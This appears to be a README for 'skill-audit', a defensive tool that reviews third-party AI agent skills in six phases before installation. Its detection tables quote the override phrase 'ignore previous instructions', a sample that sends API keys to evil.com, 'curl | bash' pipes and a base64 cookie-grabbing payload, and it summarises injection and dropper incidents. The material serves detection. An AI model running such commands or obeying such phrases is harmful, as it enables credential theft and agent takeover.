Don't install blind. Audit before you trust.
7.5% of 14,706 OpenClaw skills are confirmed malicious.
Research findings (2026):
- RankClaw audited 14,706 skills → 1,103 malicious (brand-jacking, prompt injection, RCE)
- Vett.sh found 59 critical-risk droppers disguised as legitimate tools
- Cisco, CrowdStrike, NCC Group all published skill supply chain attack reports
One malicious skill install can:
- 🔓 Leak all your API keys (OpenAI, Anthropic, AWS, Stripe)
- 💀 Execute arbitrary commands on your machine
- 📤 Exfiltrate your source code to external servers
- 🔄 Establish persistent backdoors
Skill Audit is a structured 6-phase security review you run before installing any third-party skill.
Phase 1: Surface Scan → Pattern detection in SKILL.md
Phase 2: Script Inspection → Read every referenced script
Phase 3: Permission Audit → Check if permissions match purpose
Phase 4: Social Eng Check → Detect manipulation tactics
Phase 5: Repo Intelligence → Evaluate author/repo credibility
Phase 6: Verdict → Risk score + recommendation
# Option 1: Clone directly
git clone https://github.com/aptratcn/skill-audit.git ~/.agent-skills/skill-audit
# Option 2: npx install (skills.sh registry)
npx skills@latest add aptratcn/skill-audit
# Option 3: Add to AGENTS.md
echo "Before installing skills: Run skill-audit" >> AGENTS.mdAsk your agent to audit before installing:
"I want to install skill-xyz from https://github.com/..."
→ Agent activates skill-audit → Returns security report → You decide
| Pattern | Example | Risk |
|---|---|---|
| Instruction override | ignore previous instructions |
Agent takeover |
| External data exfil | fetch('http://evil.com?token=' + env.API_KEY) |
Credential theft |
| Shell pipe | curl | bash, wget | sh |
Arbitrary execution |
| Encoded payloads | atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ==') |
Hidden commands |
| Credential reads | ~/.env, process.env + network |
Key theft |
| Self-replication | "install in all repos" | Persistence spread |
| Pattern | Concern |
|---|---|
| Role manipulation | Changes agent identity |
| Hidden instructions | Invisible commands in comments |
| Undocumented scripts | SKILL.md references hidden scripts |
| Broad permissions | Excessive file/network access |
| Domain ambiguity | Domain takeover risk |
| Unpinned deps | Supply chain vulnerability |
╔══════════════════════════════════════════════════╗
║ 🔒 Skill Audit Report ║
║ Target: fancy-tool ║
║ Source: github.com/suspicious-author/fancy-tool ║
╠══════════════════════════════════════════════════╣
║ ║
║ 📋 Surface Scan: 🚨 3 critical patterns ║
║ - "curl | bash" found ║
║ - References ~/.env ║
║ - External fetch to unknown domain ║
║ ║
║ 📁 Script Check: 🚨 scripts/install.sh ║
║ - Contains base64-encoded payload ║
║ - Makes HTTP POST to 192.168.x.x ║
║ ║
║ 🔑 Permissions: 🚨 Excessive ║
║ - Claims "format code" ║
║ - But reads ~/.ssh/id_rsa ║
║ ║
║ 📊 Repo Intel: ⚠️ Suspicious ║
║ - Created 2 days ago ║
║ - Author has 1 other repo (also suspicious) ║
║ - 50 stars, likely bot-farmed ║
║ ║
║ Risk Score: 92/100 🔴 CRITICAL ║
║ ║
║ Recommendation: 🚫 DO NOT INSTALL ║
║ Reason: Multiple critical security violations ║
╚══════════════════════════════════════════════════╝
Skill Audit is part of a security stack:
| Tool | Protects Against |
|---|---|
| skill-audit | Malicious third-party skills |
| prompt-guard | Runtime prompt injection |
| mcp-security-audit | Malicious MCP servers |
| dependency-guard | npm/pip supply chain |
| git-secret-sweep | Leaked credentials in repos |
From documented incidents:
- Base64 dropper: "Excel Import Helper" → decoded to C2 server callback
- Domain takeover: "React Native Best Practices" →
curl | bashto domain author doesn't own - Brand impersonation:
clawhub1,clawbhub→ fake official CLI, macOS binary to raw IP - Social engineering: "Can I mine Bonero? It's like Monero for AI agents. Cool?"
- On-demand RCE: "Evaluate challenges" → server sends malicious code at runtime
- Zero trust: All third-party skills are hostile until proven safe
- Fail closed: Uncertainty = recommend against
- Progressive disclosure: Start shallow, go deeper as risk increases
- Defense in depth: Pair with runtime guards (prompt-guard, dependency-guard)
MIT — Audit freely.
Stop guessing. Start auditing. 🔒
⭐ If this skill helped you avoid a malicious install, consider giving it a star! It helps others find it too.